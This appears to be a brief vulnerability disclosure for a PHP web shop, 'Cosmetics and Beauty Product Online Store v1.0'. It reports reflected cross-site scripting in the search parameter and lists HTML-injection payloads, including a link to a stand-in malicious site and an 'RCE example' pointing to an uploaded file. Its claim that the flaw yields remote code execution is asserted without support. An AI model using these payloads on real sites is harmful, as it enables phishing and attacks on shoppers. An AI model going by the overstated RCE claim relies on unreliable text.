Cosmetics-and-Beauty-Product-Online-Store
Vendor
Description:
The search parameter from /cbpos/ app on Cosmetics and Beauty Product Online Store v1.0 appears to be vulnerable to multiple XSS-Reflected attacks.
The attacker can take very sensitive information from the system and even he can prepare a very dangerous RCE by using this XSS vulnerability.
Status: CRITICAL
[+] Payloads:
<a href="https://www.malicious_site.com/">Please visit our beauty store!</a>
<a href="https://www.nu11secur1ty.com/"><img src=https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif">- RCE example:
<a href="http://192.168.1.8/cbpos/uploads/product_4/banner.3.jpg"><img src=https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif">
